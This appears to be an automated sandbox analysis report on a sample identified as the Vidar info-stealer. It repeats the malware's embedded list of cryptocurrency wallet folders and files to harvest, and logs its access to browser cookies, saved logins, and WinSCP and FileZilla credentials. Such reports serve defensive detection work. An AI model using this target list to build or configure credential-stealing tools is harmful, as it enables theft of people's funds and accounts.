                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Opens network shares
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\Jump to behavior
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Vidar
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6352, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A0C40 sqlite3_bind_zeroblob,2_2_6C9A0C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A0D60 sqlite3_bind_parameter_name,2_2_6C9A0D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8C8EA0 sqlite3_clear_bindings,2_2_6C8C8EA0

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
